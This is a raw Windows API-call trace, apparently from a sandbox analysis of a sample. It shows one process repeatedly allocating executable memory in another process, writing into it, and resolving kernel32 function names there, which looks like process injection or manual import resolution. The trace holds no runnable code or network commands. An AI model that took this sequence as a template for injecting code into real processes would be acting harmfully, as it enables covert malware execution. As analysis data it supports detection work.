	[0197.698] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc236*, nSize=0x19, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc236*, lpNumberOfBytesWritten=0x12857c*=0x19) returned 1
	[0197.698] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.698] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.698] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.698] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.699] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.699] ResetEvent (hEvent=0x498) returned 1
	[0197.699] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.699] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.699] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.700] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.700] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.700] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca148, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.700] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.700] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.700] lstrlenA (lpString="SetUnhandledExceptionFilter") returned 27
	[0197.700] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.700] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc252*, nSize=0x1c, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc252*, lpNumberOfBytesWritten=0x12857c*=0x1c) returned 1
	[0197.701] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.701] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.701] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.701] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.701] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.702] ResetEvent (hEvent=0x498) returned 1
	[0197.702] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.702] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.702] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.702] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.702] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.702] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca14c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.702] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.703] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.703] lstrlenA (lpString="GetStartupInfoW") returned 15
	[0197.703] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.703] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc270*, nSize=0x10, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc270*, lpNumberOfBytesWritten=0x12857c*=0x10) returned 1
	[0197.703] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.703] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.703] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.703] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.704] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.704] ResetEvent (hEvent=0x498) returned 1
	[0197.704] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.704] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.704] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.704] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.704] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.704] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca150, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.705] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.705] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.705] lstrlenA (lpString="IsProcessorFeaturePresent") returned 25
	[0197.705] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.705] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc282*, nSize=0x1a, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc282*, lpNumberOfBytesWritten=0x12857c*=0x1a) returned 1
	[0197.706] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.706] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.706] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.706] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.706] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.706] ResetEvent (hEvent=0x498) returned 1
	[0197.706] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.746] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.746] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.746] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.746] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.746] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca154, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.747] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.747] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.747] lstrlenA (lpString="InitializeSListHead") returned 19
	[0197.747] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.747] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc29e*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc29e*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0197.747] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.747] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.747] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.748] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.748] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.748] ResetEvent (hEvent=0x498) returned 1
	[0197.748] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.748] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.748] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.749] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.749] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.749] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca158, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.749] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.749] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.749] lstrlenA (lpString="TerminateProcess") returned 16
	[0197.749] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.749] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc2b4*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc2b4*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0197.750] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.750] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.750] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.750] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.750] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.751] ResetEvent (hEvent=0x498) returned 1
	[0197.751] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.751] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.751] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.751] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.751] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.751] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca15c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.751] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.752] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.752] lstrlenA (lpString="CreateMutexW") returned 12
	[0197.752] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.752] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbebc*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbebc*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0197.752] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.752] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.752] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.752] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.753] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.753] ResetEvent (hEvent=0x498) returned 1
	[0197.753] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.753] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.753] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.753] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.753] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.753] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca160, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.754] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.754] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.754] lstrlenA (lpString="QueryPerformanceFrequency") returned 25
	[0197.754] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.754] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bcafa*, nSize=0x1a, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bcafa*, lpNumberOfBytesWritten=0x12857c*=0x1a) returned 1
	[0197.754] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.754] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.754] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.755] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.755] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.755] ResetEvent (hEvent=0x498) returned 1
	[0197.755] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.755] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.755] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.756] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.756] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.756] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca164, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.756] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.756] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.756] lstrlenA (lpString="GetTempPathW") returned 12
	[0197.756] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.756] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbeac*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbeac*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0197.757] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.757] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.757] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.757] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.757] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.758] ResetEvent (hEvent=0x498) returned 1
	[0197.758] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.758] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.758] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.758] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.758] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.758] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca168, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.758] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.759] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.759] lstrlenA (lpString="UnlockFileEx") returned 12
	[0197.759] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.759] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.760] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.760] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.760] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.760] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.760] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.761] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.761] lstrlenA (lpString="SetEndOfFile") returned 12
	[0197.761] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.761] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.761] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.761] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.762] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.762] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.762] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.762] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.762] lstrlenA (lpString="GetFullPathNameA") returned 16
	[0197.762] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.763] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.763] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.763] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.763] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.763] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.763] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.764] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.764] lstrlenA (lpString="SetFilePointer") returned 14
	[0197.764] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.764] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
